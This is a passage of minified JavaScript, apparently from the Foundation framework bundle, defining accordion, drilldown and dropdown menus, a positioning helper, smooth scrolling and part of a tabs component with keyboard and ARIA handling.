t);e.prototype=Object.create(t&&t.prototype,{constructor:{value:e,enumerable:!1,writable:!0,configurable:!0}}),t&&(Object.setPrototypeOf?Object.setPrototypeOf(e,t):e.__proto__=t)}(i,o["a"]),s(i,[{key:"_setup",value:function(e,t){this.$element=e,this.options=r.a.extend({},i.defaults,this.$element.data(),t),this.className="AccordionMenu",this._init(),l.a.register("AccordionMenu",{ENTER:"toggle",SPACE:"toggle",ARROW_RIGHT:"open",ARROW_UP:"up",ARROW_DOWN:"down",ARROW_LEFT:"close",ESCAPE:"closeAll"})}},{key:"_init",value:function(){n.a.Feather(this.$element,"accordion");var s=this;this.$element.find("[data-submenu]").not(".is-active").slideUp(0),this.$element.attr({role:"tree","aria-multiselectable":this.options.multiOpen}),this.$menuLinks=this.$element.find(".is-accordion-submenu-parent"),this.$menuLinks.each(function(){var e=this.id||a.i(c.b)(6,"acc-menu-link"),t=r()(this),i=t.children("[data-submenu]"),n=i[0].id||a.i(c.b)(6,"acc-menu"),o=i.hasClass("is-active");s.options.submenuToggle?(t.addClass("has-submenu-toggle"),t.children("a").after('<button id="'+e+'" class="submenu-toggle" aria-controls="'+n+'" aria-expanded="'+o+'" title="'+s.options.submenuToggleText+'"><span class="submenu-toggle-text">'+s.options.submenuToggleText+"</span></button>")):t.attr({"aria-controls":n,"aria-expanded":o,id:e}),i.attr({"aria-labelledby":e,"aria-hidden":!o,role:"group",id:n})}),this.$element.find("li").attr({role:"treeitem"});var e=this.$element.find(".is-active");if(e.length){s=this;e.each(function(){s.down(r()(this))})}this._events()}},{key:"_events",value:function(){var a=this;this.$element.find("li").each(function(){var t=r()(this).children("[data-submenu]");t.length&&(a.options.submenuToggle?r()(this).children(".submenu-toggle").off("click.zf.accordionMenu").on("click.zf.accordionMenu",function(e){a.toggle(t)}):r()(this).children("a").off("click.zf.accordionMenu").on("click.zf.accordionMenu",function(e){e.preventDefault(),a.toggle(t)}))}).on("keydown.zf.accordionmenu",function(t){var i,n,o=r()(this),s=o.parent("ul").children("li"),e=o.children("[data-submenu]");s.each(function(e){if(r()(this).is(o))return i=s.eq(Math.max(0,e-1)).find("a").first(),n=s.eq(Math.min(e+1,s.length-1)).find("a").first(),r()(this).children("[data-submenu]:visible").length&&(n=o.find("li:first-child").find("a").first()),r()(this).is(":first-child")?i=o.parents("li").first().find("a").first():i.parents("li").first().children("[data-submenu]:visible").length&&(i=i.parents("li").find("li:last-child").find("a").first()),void(r()(this).is(":last-child")&&(n=o.parents("li").first().next("li").find("a").first()))}),l.a.handleKey(t,"AccordionMenu",{open:function(){e.is(":hidden")&&(a.down(e),e.find("li").first().find("a").first().focus())},close:function(){e.length&&!e.is(":hidden")?a.up(e):o.parent("[data-submenu]").length&&(a.up(o.parent("[data-submenu]")),o.parents("li").first().find("a").first().focus())},up:function(){return i.focus(),!0},down:function(){return n.focus(),!0},toggle:function(){return!a.options.submenuToggle&&(o.children("[data-submenu]").length?(a.toggle(o.children("[data-submenu]")),!0):void 0)},closeAll:function(){a.hideAll()},handled:function(e){e&&t.preventDefault(),t.stopImmediatePropagation()}})})}},{key:"hideAll",value:function(){this.up(this.$element.find("[data-submenu]"))}},{key:"showAll",value:function(){this.down(this.$element.find("[data-submenu]"))}},{key:"toggle",value:function(e){e.is(":animated")||(e.is(":hidden")?this.down(e):this.up(e))}},{key:"down",value:function(e){var t=this;this.options.multiOpen||this.up(this.$element.find(".is-active").not(e.parentsUntil(this.$element).add(e))),e.addClass("is-active").attr({"aria-hidden":!1}),this.options.submenuToggle?e.prev(".submenu-toggle").attr({"aria-expanded":!0}):e.parent(".is-accordion-submenu-parent").attr({"aria-expanded":!0}),e.slideDown(t.options.slideSpeed,function(){t.$element.trigger("down.zf.accordionMenu",[e])})}},{key:"up",value:function(e){var t=this;e.slideUp(t.options.slideSpeed,function(){t.$element.trigger("up.zf.accordionMenu",[e])});var i=e.find("[data-submenu]").slideUp(0).addBack().attr("aria-hidden",!0);this.options.submenuToggle?i.prev(".submenu-toggle").attr("aria-expanded",!1):i.parent(".is-accordion-submenu-parent").attr("aria-expanded",!1)}},{key:"_destroy",value:function(){this.$element.find("[data-submenu]").slideDown(0).css("display",""),this.$element.find("a").off("click.zf.accordionMenu"),this.options.submenuToggle&&(this.$element.find(".has-submenu-toggle").removeClass("has-submenu-toggle"),this.$element.find(".submenu-toggle").remove()),n.a.Burn(this.$element,"accordion")}}]),i}();u.defaults={slideSpeed:250,submenuToggle:!1,submenuToggleText:"Toggle menu",multiOpen:!0}},function(e,t,a){"use strict";a.d(t,"a",function(){return d});var i=a(0),r=a.n(i),l=a(3),n=a(9),c=a(1),o=a(7),s=a(2),u=function(){function n(e,t){for(var i=0;i<t.length;i++){var n=t[i];n.enumerable=n.enumerable||!1,n.configurable=!0,"value"in n&&(n.writable=!0),Object.defineProperty(e,n.key,n)}}return function(e,t,i){return t&&n(e.prototype,t),i&&n(e,i),e}}(),d=function(e){function i(){return function(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a function")}(this,i),function(e,t){if(!e)throw new ReferenceError("this hasn't been initialised - super() hasn't been called");return!t||"object"!=typeof t&&"function"!=typeof t?e:t}(this,(i.__proto__||Object.getPrototypeOf(i)).apply(this,arguments))}return function(e,t){if("function"!=typeof t&&null!==t)throw new TypeError("Super expression must either be null or a function, not "+typeof t);e.prototype=Object.create(t&&t.prototype,{constructor:{value:e,enumerable:!1,writable:!0,configurable:!0}}),t&&(Object.setPrototypeOf?Object.setPrototypeOf(e,t):e.__proto__=t)}(i,s["a"]),u(i,[{key:"_setup",value:function(e,t){this.$element=e,this.options=r.a.extend({},i.defaults,this.$element.data(),t),this.className="Drilldown",this._init(),l.a.register("Drilldown",{ENTER:"open",SPACE:"open",ARROW_RIGHT:"next",ARROW_UP:"up",ARROW_DOWN:"down",ARROW_LEFT:"previous",ESCAPE:"close",TAB:"down",SHIFT_TAB:"up"})}},{key:"_init",value:function(){n.a.Feather(this.$element,"drilldown"),this.options.autoApplyClass&&this.$element.addClass("drilldown"),this.$element.attr({role:"tree","aria-multiselectable":!1}),this.$submenuAnchors=this.$element.find("li.is-drilldown-submenu-parent").children("a"),this.$submenus=this.$submenuAnchors.parent("li").children("[data-submenu]").attr("role","group"),this.$menuItems=this.$element.find("li").not(".js-drilldown-back").attr("role","treeitem").find("a"),this.$element.attr("data-mutate",this.$element.attr("data-drilldown")||a.i(c.b)(6,"drilldown")),this._prepareMenu(),this._registerEvents(),this._keyboardEvents()}},{key:"_prepareMenu",value:function(){var i=this;this.$submenuAnchors.each(function(){var e=r()(this),t=e.parent();i.options.parentLink&&e.clone().prependTo(t.children("[data-submenu]")).wrap('<li class="is-submenu-parent-item is-submenu-item is-drilldown-submenu-item" role="menuitem"></li>'),e.data("savedHref",e.attr("href")).removeAttr("href").attr("tabindex",0),e.children("[data-submenu]").attr({"aria-hidden":!0,tabindex:0,role:"group"}),i._events(e)}),this.$submenus.each(function(){var e=r()(this);if(!e.find(".js-drilldown-back").length)switch(i.options.backButtonPosition){case"bottom":e.append(i.options.backButton);break;case"top":e.prepend(i.options.backButton);break;default:console.error("Unsupported backButtonPosition value '"+i.options.backButtonPosition+"'")}i._back(e)}),this.$submenus.addClass("invisible"),this.options.autoHeight||this.$submenus.addClass("drilldown-submenu-cover-previous"),this.$element.parent().hasClass("is-drilldown")||(this.$wrapper=r()(this.options.wrapper).addClass("is-drilldown"),this.options.animateHeight&&this.$wrapper.addClass("animate-height"),this.$element.wrap(this.$wrapper)),this.$wrapper=this.$element.parent(),this.$wrapper.css(this._getMaxDims())}},{key:"_resize",value:function(){this.$wrapper.css({"max-width":"none","min-height":"none"}),this.$wrapper.css(this._getMaxDims())}},{key:"_events",value:function(i){var n=this;i.off("click.zf.drilldown").on("click.zf.drilldown",function(e){if(r()(e.target).parentsUntil("ul","li").hasClass("is-drilldown-submenu-parent")&&(e.stopImmediatePropagation(),e.preventDefault()),n._show(i.parent("li")),n.options.closeOnClick){var t=r()("body");t.off(".zf.drilldown").on("click.zf.drilldown",function(e){e.target===n.$element[0]||r.a.contains(n.$element[0],e.target)||(e.preventDefault(),n._hideAll(),t.off(".zf.drilldown"))})}})}},{key:"_registerEvents",value:function(){this.options.scrollTop&&(this._bindHandler=this._scrollTop.bind(this),this.$element.on("open.zf.drilldown hide.zf.drilldown closed.zf.drilldown",this._bindHandler)),this.$element.on("mutateme.zf.trigger",this._resize.bind(this))}},{key:"_scrollTop",value:function(){var e=this,t=""!=e.options.scrollTopElement?r()(e.options.scrollTopElement):e.$element,i=parseInt(t.offset().top+e.options.scrollTopOffset,10);r()("html, body").stop(!0).animate({scrollTop:i},e.options.animationDuration,e.options.animationEasing,function(){this===r()("html")[0]&&e.$element.trigger("scrollme.zf.drilldown")})}},{key:"_keyboardEvents",value:function(){var e=this;this.$menuItems.add(this.$element.find(".js-drilldown-back > a, .is-submenu-parent-item > a")).on("keydown.zf.drilldown",function(t){var i,n,o=r()(this),s=o.parent("li").parent("ul").children("li").children("a");s.each(function(e){if(r()(this).is(o))return i=s.eq(Math.max(0,e-1)),void(n=s.eq(Math.min(e+1,s.length-1)))}),l.a.handleKey(t,"Drilldown",{next:function(){if(o.is(e.$submenuAnchors))return e._show(o.parent("li")),o.parent("li").one(a.i(c.c)(o),function(){o.parent("li").find("ul li a").filter(e.$menuItems).first().focus()}),!0},previous:function(){return e._hide(o.parent("li").parent("ul")),o.parent("li").parent("ul").one(a.i(c.c)(o),function(){setTimeout(function(){o.parent("li").parent("ul").parent("li").children("a").first().focus()},1)}),!0},up:function(){return i.focus(),!o.is(e.$element.find("> li:first-child > a"))},down:function(){return n.focus(),!o.is(e.$element.find("> li:last-child > a"))},close:function(){o.is(e.$element.find("> li > a"))||(e._hide(o.parent().parent()),o.parent().parent().siblings("a").focus())},open:function(){return o.is(e.$menuItems)?o.is(e.$submenuAnchors)?(e._show(o.parent("li")),o.parent("li").one(a.i(c.c)(o),function(){o.parent("li").find("ul li a").filter(e.$menuItems).first().focus()}),!0):void 0:(e._hide(o.parent("li").parent("ul")),o.parent("li").parent("ul").one(a.i(c.c)(o),function(){setTimeout(function(){o.parent("li").parent("ul").parent("li").children("a").first().focus()},1)}),!0)},handled:function(e){e&&t.preventDefault(),t.stopImmediatePropagation()}})})}},{key:"_hideAll",value:function(){var t=this.$element.find(".is-drilldown-submenu.is-active").addClass("is-closing");this.options.autoHeight&&this.$wrapper.css({height:t.parent().closest("ul").data("calcHeight")}),t.one(a.i(c.c)(t),function(e){t.removeClass("is-active is-closing")}),this.$element.trigger("closed.zf.drilldown")}},{key:"_back",value:function(i){var n=this;i.off("click.zf.drilldown"),i.children(".js-drilldown-back").on("click.zf.drilldown",function(e){e.stopImmediatePropagation(),n._hide(i);var t=i.parent("li").parent("ul").parent("li");t.length&&n._show(t)})}},{key:"_menuLinkEvents",value:function(){var t=this;this.$menuItems.not(".is-drilldown-submenu-parent").off("click.zf.drilldown").on("click.zf.drilldown",function(e){setTimeout(function(){t._hideAll()},0)})}},{key:"_show",value:function(e){this.options.autoHeight&&this.$wrapper.css({height:e.children("[data-submenu]").data("calcHeight")}),e.attr("aria-expanded",!0),e.children("[data-submenu]").addClass("is-active").removeClass("invisible").attr("aria-hidden",!1),this.$element.trigger("open.zf.drilldown",[e])}},{key:"_hide",value:function(e){this.options.autoHeight&&this.$wrapper.css({height:e.parent().closest("ul").data("calcHeight")});e.parent("li").attr("aria-expanded",!1),e.attr("aria-hidden",!0).addClass("is-closing"),e.addClass("is-closing").one(a.i(c.c)(e),function(){e.removeClass("is-active is-closing"),e.blur().addClass("invisible")}),e.trigger("hide.zf.drilldown",[e])}},{key:"_getMaxDims",value:function(){var t=0,i={},n=this;return this.$submenus.add(this.$element).each(function(){r()(this).children("li").length;var e=o.a.GetDimensions(this).height;t=t<e?e:t,n.options.autoHeight&&(r()(this).data("calcHeight",e),r()(this).hasClass("is-drilldown-submenu")||(i.height=e))}),this.options.autoHeight||(i["min-height"]=t+"px"),i["max-width"]=this.$element[0].getBoundingClientRect().width+"px",i}},{key:"_destroy",value:function(){this.options.scrollTop&&this.$element.off(".zf.drilldown",this._bindHandler),this._hideAll(),this.$element.off("mutateme.zf.trigger"),n.a.Burn(this.$element,"drilldown"),this.$element.unwrap().find(".js-drilldown-back, .is-submenu-parent-item").remove().end().find(".is-active, .is-closing, .is-drilldown-submenu").removeClass("is-active is-closing is-drilldown-submenu").end().find("[data-submenu]").removeAttr("aria-hidden tabindex role"),this.$submenuAnchors.each(function(){r()(this).off(".zf.drilldown")}),this.$submenus.removeClass("drilldown-submenu-cover-previous invisible"),this.$element.find("a").each(function(){var e=r()(this);e.removeAttr("tabindex"),e.data("savedHref")&&e.attr("href",e.data("savedHref")).removeData("savedHref")})}}]),i}();d.defaults={autoApplyClass:!0,backButton:'<li class="js-drilldown-back"><a tabindex="0">Back</a></li>',backButtonPosition:"top",wrapper:"<div></div>",parentLink:!1,closeOnClick:!1,autoHeight:!1,animateHeight:!1,scrollTop:!1,scrollTopElement:"",scrollTopOffset:0,animationDuration:500,animationEasing:"swing"}},function(e,t,n){"use strict";n.d(t,"a",function(){return c});var i=n(0),h=n.n(i),p=n(3),o=n(9),a=n(7),s=n(1),r=n(2),l=function(){function n(e,t){for(var i=0;i<t.length;i++){var n=t[i];n.enumerable=n.enumerable||!1,n.configurable=!0,"value"in n&&(n.writable=!0),Object.defineProperty(e,n.key,n)}}return function(e,t,i){return t&&n(e.prototype,t),i&&n(e,i),e}}(),c=function(e){function i(){return function(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a function")}(this,i),function(e,t){if(!e)throw new ReferenceError("this hasn't been initialised - super() hasn't been called");return!t||"object"!=typeof t&&"function"!=typeof t?e:t}(this,(i.__proto__||Object.getPrototypeOf(i)).apply(this,arguments))}return function(e,t){if("function"!=typeof t&&null!==t)throw new TypeError("Super expression must either be null or a function, not "+typeof t);e.prototype=Object.create(t&&t.prototype,{constructor:{value:e,enumerable:!1,writable:!0,configurable:!0}}),t&&(Object.setPrototypeOf?Object.setPrototypeOf(e,t):e.__proto__=t)}(i,r["a"]),l(i,[{key:"_setup",value:function(e,t){this.$element=e,this.options=h.a.extend({},i.defaults,this.$element.data(),t),this.className="DropdownMenu",this._init(),p.a.register("DropdownMenu",{ENTER:"open",SPACE:"open",ARROW_RIGHT:"next",ARROW_UP:"up",ARROW_DOWN:"down",ARROW_LEFT:"previous",ESCAPE:"close"})}},{key:"_init",value:function(){o.a.Feather(this.$element,"dropdown");var e=this.$element.find("li.is-dropdown-submenu-parent");this.$element.children(".is-dropdown-submenu-parent").children(".is-dropdown-submenu").addClass("first-sub"),this.$menuItems=this.$element.find('[role="menuitem"]'),this.$tabs=this.$element.children('[role="menuitem"]'),this.$tabs.find("ul.is-dropdown-submenu").addClass(this.options.verticalClass),"auto"===this.options.alignment?this.$element.hasClass(this.options.rightClass)||n.i(s.a)()||this.$element.parents(".top-bar-right").is("*")?(this.options.alignment="right",e.addClass("opens-left")):(this.options.alignment="left",e.addClass("opens-right")):"right"===this.options.alignment?e.addClass("opens-left"):e.addClass("opens-right"),this.changed=!1,this._events()}},{key:"_isVertical",value:function(){return"block"===this.$tabs.css("display")||"column"===this.$element.css("flex-direction")}},{key:"_isRtl",value:function(){return this.$element.hasClass("align-right")||n.i(s.a)()&&!this.$element.hasClass("align-left")}},{key:"_events",value:function(){var d=this,s="ontouchstart"in window||void 0!==window.ontouchstart,a="is-dropdown-submenu-parent";(this.options.clickOpen||s)&&this.$menuItems.on("click.zf.dropdownmenu touchstart.zf.dropdownmenu",function(e){var t=h()(e.target).parentsUntil("ul","."+a),i=t.hasClass(a),n="true"===t.attr("data-is-click"),o=t.children(".is-dropdown-submenu");if(i)if(n){if(!d.options.closeOnClick||!d.options.clickOpen&&!s||d.options.forceFollow&&s)return;e.stopImmediatePropagation(),e.preventDefault(),d._hide(t)}else e.preventDefault(),e.stopImmediatePropagation(),d._show(o),t.add(t.parentsUntil(d.$element,"."+a)).attr("data-is-click",!0)}),d.options.closeOnClickInside&&this.$menuItems.on("click.zf.dropdownmenu",function(e){h()(this).hasClass(a)||d._hide()}),this.options.disableHover||this.$menuItems.on("mouseenter.zf.dropdownmenu",function(e){var t=h()(this);t.hasClass(a)&&(clearTimeout(t.data("_delay")),t.data("_delay",setTimeout(function(){d._show(t.children(".is-dropdown-submenu"))},d.options.hoverDelay)))}).on("mouseleave.zf.dropdownmenu",function(e){var t=h()(this);if(t.hasClass(a)&&d.options.autoclose){if("true"===t.attr("data-is-click")&&d.options.clickOpen)return!1;clearTimeout(t.data("_delay")),t.data("_delay",setTimeout(function(){d._hide(t)},d.options.closingTime))}}),this.$menuItems.on("keydown.zf.dropdownmenu",function(t){var i,n,o=h()(t.target).parentsUntil("ul",'[role="menuitem"]'),e=-1<d.$tabs.index(o),s=e?d.$tabs:o.siblings("li").add(o);s.each(function(e){if(h()(this).is(o))return i=s.eq(e-1),void(n=s.eq(e+1))});var a=function(){n.children("a:first").focus(),t.preventDefault()},r=function(){i.children("a:first").focus(),t.preventDefault()},l=function(){var e=o.children("ul.is-dropdown-submenu");e.length&&(d._show(e),o.find("li > a:first").focus(),t.preventDefault())},c=function(){var e=o.parent("ul").parent("li");e.children("a:first").focus(),d._hide(e),t.preventDefault()},u={open:l,close:function(){d._hide(d.$element),d.$menuItems.eq(0).children("a").focus(),t.preventDefault()},handled:function(){t.stopImmediatePropagation()}};e?d._isVertical()?d._isRtl()?h.a.extend(u,{down:a,up:r,next:c,previous:l}):h.a.extend(u,{down:a,up:r,next:l,previous:c}):d._isRtl()?h.a.extend(u,{next:r,previous:a,down:l,up:c}):h.a.extend(u,{next:a,previous:r,down:l,up:c}):d._isRtl()?h.a.extend(u,{next:c,previous:l,down:a,up:r}):h.a.extend(u,{next:l,previous:c,down:a,up:r}),p.a.handleKey(t,"DropdownMenu",u)})}},{key:"_addBodyHandler",value:function(){var t=h()(document.body),i=this;t.off("mouseup.zf.dropdownmenu touchend.zf.dropdownmenu").on("mouseup.zf.dropdownmenu touchend.zf.dropdownmenu",function(e){i.$element.find(e.target).length||(i._hide(),t.off("mouseup.zf.dropdownmenu touchend.zf.dropdownmenu"))})}},{key:"_show",value:function(i){var e=this.$tabs.index(this.$tabs.filter(function(e,t){return 0<h()(t).find(i).length})),t=i.parent("li.is-dropdown-submenu-parent").siblings("li.is-dropdown-submenu-parent");this._hide(t,e),i.css("visibility","hidden").addClass("js-dropdown-active").parent("li.is-dropdown-submenu-parent").addClass("is-active");var n=a.a.ImNotTouchingYou(i,null,!0);if(!n){var o="left"===this.options.alignment?"-right":"-left",s=i.parent(".is-dropdown-submenu-parent");s.removeClass("opens"+o).addClass("opens-"+this.options.alignment),(n=a.a.ImNotTouchingYou(i,null,!0))||s.removeClass("opens-"+this.options.alignment).addClass("opens-inner"),this.changed=!0}i.css("visibility",""),this.options.closeOnClick&&this._addBodyHandler(),this.$element.trigger("show.zf.dropdownmenu",[i])}},{key:"_hide",value:function(e,i){var t;if((t=e&&e.length?e:void 0!==i?this.$tabs.not(function(e,t){return e===i}):this.$element).hasClass("is-active")||0<t.find(".is-active").length){if(t.find("li.is-active").add(t).attr({"data-is-click":!1}).removeClass("is-active"),t.find("ul.js-dropdown-active").removeClass("js-dropdown-active"),this.changed||t.find("opens-inner").length){var n="left"===this.options.alignment?"right":"left";t.find("li.is-dropdown-submenu-parent").add(t).removeClass("opens-inner opens-"+this.options.alignment).addClass("opens-"+n),this.changed=!1}this.$element.trigger("hide.zf.dropdownmenu",[t])}}},{key:"_destroy",value:function(){this.$menuItems.off(".zf.dropdownmenu").removeAttr("data-is-click").removeClass("is-right-arrow is-left-arrow is-down-arrow opens-right opens-left opens-inner"),h()(document.body).off(".zf.dropdownmenu"),o.a.Burn(this.$element,"dropdown")}}]),i}();c.defaults={disableHover:!1,autoclose:!0,hoverDelay:50,clickOpen:!1,closingTime:500,alignment:"auto",closeOnClick:!0,closeOnClickInside:!0,verticalClass:"vertical",rightClass:"align-right",forceFollow:!0}},function(e,t,i){"use strict";function n(e,t){var i=t.indexOf(e);return i===t.length-1?t[0]:t[i+1]}i.d(t,"a",function(){return h});var a=i(7),o=i(2),s=i(1),r=function(){function n(e,t){for(var i=0;i<t.length;i++){var n=t[i];n.enumerable=n.enumerable||!1,n.configurable=!0,"value"in n&&(n.writable=!0),Object.defineProperty(e,n.key,n)}}return function(e,t,i){return t&&n(e.prototype,t),i&&n(e,i),e}}(),l=["left","right","top","bottom"],c=["top","bottom","center"],u=["left","right","center"],d={left:c,right:c,top:u,bottom:u},h=function(e){function t(){return function(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a function")}(this,t),function(e,t){if(!e)throw new ReferenceError("this hasn't been initialised - super() hasn't been called");return!t||"object"!=typeof t&&"function"!=typeof t?e:t}(this,(t.__proto__||Object.getPrototypeOf(t)).apply(this,arguments))}return function(e,t){if("function"!=typeof t&&null!==t)throw new TypeError("Super expression must either be null or a function, not "+typeof t);e.prototype=Object.create(t&&t.prototype,{constructor:{value:e,enumerable:!1,writable:!0,configurable:!0}}),t&&(Object.setPrototypeOf?Object.setPrototypeOf(e,t):e.__proto__=t)}(t,o["a"]),r(t,[{key:"_init",value:function(){this.triedPositions={},this.position="auto"===this.options.position?this._getDefaultPosition():this.options.position,this.alignment="auto"===this.options.alignment?this._getDefaultAlignment():this.options.alignment}},{key:"_getDefaultPosition",value:function(){return"bottom"}},{key:"_getDefaultAlignment",value:function(){switch(this.position){case"bottom":case"top":return i.i(s.a)()?"right":"left";case"left":case"right":return"bottom"}}},{key:"_reposition",value:function(){this._alignmentsExhausted(this.position)?(this.position=n(this.position,l),this.alignment=d[this.position][0]):this._realign()}},{key:"_realign",value:function(){this._addTriedPosition(this.position,this.alignment),this.alignment=n(this.alignment,d[this.position])}},{key:"_addTriedPosition",value:function(e,t){this.triedPositions[e]=this.triedPositions[e]||[],this.triedPositions[e].push(t)}},{key:"_positionsExhausted",value:function(){for(var e=!0,t=0;t<l.length;t++)e=e&&this._alignmentsExhausted(l[t]);return e}},{key:"_alignmentsExhausted",value:function(e){return this.triedPositions[e]&&this.triedPositions[e].length==d[e].length}},{key:"_getVOffset",value:function(){return this.options.vOffset}},{key:"_getHOffset",value:function(){return this.options.hOffset}},{key:"_setPosition",value:function(e,t,i){if("false"===e.attr("aria-expanded"))return!1;a.a.GetDimensions(t),a.a.GetDimensions(e);if(t.offset(a.a.GetExplicitOffsets(t,e,this.position,this.alignment,this._getVOffset(),this._getHOffset())),!this.options.allowOverlap){for(var n=1e8,o={position:this.position,alignment:this.alignment};!this._positionsExhausted();){var s=a.a.OverlapArea(t,i,!1,!1,this.options.allowBottomOverlap);if(0===s)return;s<n&&(n=s,o={position:this.position,alignment:this.alignment}),this._reposition(),t.offset(a.a.GetExplicitOffsets(t,e,this.position,this.alignment,this._getVOffset(),this._getHOffset()))}this.position=o.position,this.alignment=o.alignment,t.offset(a.a.GetExplicitOffsets(t,e,this.position,this.alignment,this._getVOffset(),this._getHOffset()))}}}]),t}();h.defaults={position:"auto",alignment:"auto",allowOverlap:!1,allowBottomOverlap:!0,vOffset:0,hOffset:0}},function(e,t,i){"use strict";i.d(t,"a",function(){return o});var n=i(0),s=i.n(n),a=i(1),r=i(2),l=function(){function n(e,t){for(var i=0;i<t.length;i++){var n=t[i];n.enumerable=n.enumerable||!1,n.configurable=!0,"value"in n&&(n.writable=!0),Object.defineProperty(e,n.key,n)}}return function(e,t,i){return t&&n(e.prototype,t),i&&n(e,i),e}}(),o=function(e){function o(){return function(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a function")}(this,o),function(e,t){if(!e)throw new ReferenceError("this hasn't been initialised - super() hasn't been called");return!t||"object"!=typeof t&&"function"!=typeof t?e:t}(this,(o.__proto__||Object.getPrototypeOf(o)).apply(this,arguments))}return function(e,t){if("function"!=typeof t&&null!==t)throw new TypeError("Super expression must either be null or a function, not "+typeof t);e.prototype=Object.create(t&&t.prototype,{constructor:{value:e,enumerable:!1,writable:!0,configurable:!0}}),t&&(Object.setPrototypeOf?Object.setPrototypeOf(e,t):e.__proto__=t)}(o,r["a"]),l(o,[{key:"_setup",value:function(e,t){this.$element=e,this.options=s.a.extend({},o.defaults,this.$element.data(),t),this.className="SmoothScroll",this._init()}},{key:"_init",value:function(){var e=this.$element[0].id||i.i(a.b)(6,"smooth-scroll");this.$element.attr({id:e}),this._events()}},{key:"_events",value:function(){var i=this,e=function(e){if(!s()(this).is('a[href^="#"]'))return!1;var t=this.getAttribute("href");i._inTransition=!0,o.scrollToLoc(t,i.options,function(){i._inTransition=!1}),e.preventDefault()};this.$element.on("click.zf.smoothScroll",e),this.$element.on("click.zf.smoothScroll",'a[href^="#"]',e)}}],[{key:"scrollToLoc",value:function(e){var t=1<arguments.length&&void 0!==arguments[1]?arguments[1]:o.defaults,i=arguments[2];if(!s()(e).length)return!1;var n=Math.round(s()(e).offset().top-t.threshold/2-t.offset);s()("html, body").stop(!0).animate({scrollTop:n},t.animationDuration,t.animationEasing,function(){i&&"function"==typeof i&&i()})}}]),o}();o.defaults={animationDuration:500,animationEasing:"linear",threshold:50,offset:0}},function(e,t,o){"use strict";o.d(t,"a",function(){return c});var i=o(0),r=o.n(i),a=o(3),s=o(8),n=o(2),l=function(){function n(e,t){for(var i=0;i<t.length;i++){var n=t[i];n.enumerable=n.enumerable||!1,n.configurable=!0,"value"in n&&(n.writable=!0),Object.defineProperty(e,n.key,n)}}return function(e,t,i){return t&&n(e.prototype,t),i&&n(e,i),e}}(),c=function(e){function i(){return function(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a function")}(this,i),function(e,t){if(!e)throw new ReferenceError("this hasn't been initialised - super() hasn't been called");return!t||"object"!=typeof t&&"function"!=typeof t?e:t}(this,(i.__proto__||Object.getPrototypeOf(i)).apply(this,arguments))}return function(e,t){if("function"!=typeof t&&null!==t)throw new TypeError("Super expression must either be null or a function, not "+typeof t);e.prototype=Object.create(t&&t.prototype,{constructor:{value:e,enumerable:!1,writable:!0,configurable:!0}}),t&&(Object.setPrototypeOf?Object.setPrototypeOf(e,t):e.__proto__=t)}(i,n["a"]),l(i,[{key:"_setup",value:function(e,t){this.$element=e,this.options=r.a.extend({},i.defaults,this.$element.data(),t),this.className="Tabs",this._init(),a.a.register("Tabs",{ENTER:"open",SPACE:"open",ARROW_RIGHT:"next",ARROW_UP:"previous",ARROW_DOWN:"next",ARROW_LEFT:"previous"})}},{key:"_init",value:function(){var n=this,a=this;if(this.$element.attr({role:"tablist"}),this.$tabTitles=this.$element.find("."+this.options.linkClass),this.$tabContent=r()('[data-tabs-content="'+this.$element[0].id+'"]'),this.$tabTitles.each(function(){var e=r()(this),t=e.find("a"),i=e.hasClass(""+a.options.linkActiveClass),n=t.attr("data-tabs-target")||t[0].hash.slice(1),o=t[0].id?t[0].id:n+"-label",s=r()("#"+n);e.attr({role:"presentation"}),t.attr({role:"tab","aria-controls":n,"aria-selected":i,id:o,tabindex:i?"0":"-1"}),s.attr({role:"tabpanel","aria-labelledby":o}),i||s.attr("aria-hidden","true"),i&&a.options.autoFocus&&r()(window).load(function(){r()("html, body").animate({scrollTop:e.offset().top},a.options.deepLinkSmudgeDelay,function(){t.focus()})})}),this.options.matchHeight){var e=this.$tabContent.find("img");e.length?o.i(s.a)(e,this._setHeight.bind(this)):this._setHeight()}this._checkDeepLink=function(){var e=window.location.hash;if(e.length){var t=n.$element.find('[href$="'+e+'"]');if(t.length){if(n.selectTab(r()(e),!0),n.options.deepLinkSmudge){var i=n.$element.offset();r()("html, body").animate({scrollTop:i.top},n.options.deepLinkSmudgeDelay)}n.$element.trigger("deeplink.zf.tabs",[t,r()(e)])}}},this.options.deepLink&&this._checkDeepLink(),this._events()}},{key:"_events",value:function(){this._addKeyHandler(),this._addClickHandler(),this._setHeightMqHandler=null,this.options.matchHeight&&(this._setHeightMqHandler=this._setHeight.bind(this),r()(window).on("changed.zf.mediaquery",this._setHeightMqHandler)),this.options.deepLink&&r()(window).on("popstate",this._checkDeepLink)}},{key:"_addClickHandler",value:function(){var t=this;this.$element.off("click.zf.tabs").on("click.zf.tabs","."+this.options.linkClass,function(e){e.preventDefault(),e.stopPropagation(),t._handleTabChange(r()(this))})}},{key:"_addKeyHandler",value:function(){var s=this;this.$tabTitles.off("keydown.zf.tabs").on("keydown.zf.tabs",function(e){if(9!==e.which){var t,i,n=r()(this),o=n.parent("ul").children("li");o.each(function(e){r()(this).is(n)&&(s.options.wrapOnKeys?(t=0===e?o.last():o.eq(e-1),i=e===o.length-1?o.first():o.eq(e+1)):(t=o.eq(Math.max(0,e-1)),i=o.eq(Math.min(e+1,o.length-1))))}),a.a.handleKey(e,"Tabs",{open:function(){n.find('[role="tab"]').focus(),s._handleTabChange(n)},previous:function(){t.find('[role="tab"]').focus(),s._handleTabChange(t)},next:function(){i.find('[role="tab"]').focus(),s._handleTabChange(i)},handled:function(){e.stopPropagation(),e.preventDefault()}})}})}},{key:"_handleTabChange",value:function(e,t){if(e.hasClass(""+this.options.linkActiveClass))this.options.activeCollapse&&(this._collapseTab(e),this.$element.trigger("collapse.zf.tabs",[e]));else{var i=this.$element.find("."+this.options.linkClass+"."+this.options.linkActiveClass),n=e.find('[role="tab"]'),o=n.attr("data-tabs-target")||n[0].hash.slice(1),s=this.$tabContent.find("#"+o);if(this._collapseTab(i),this._openTab(e),this.options.deepLink&&!t){var a=e.find("a").attr("href");this.options.updateHistory?history.pushState({},"",a):history.replaceState({},"",a)}this.$element.trigger("change.zf.tabs",[e,s]),s.find("[data-mutate]").trigger("mutateme.zf.trigger")}}},{key:"_openTab",value:function(e){var 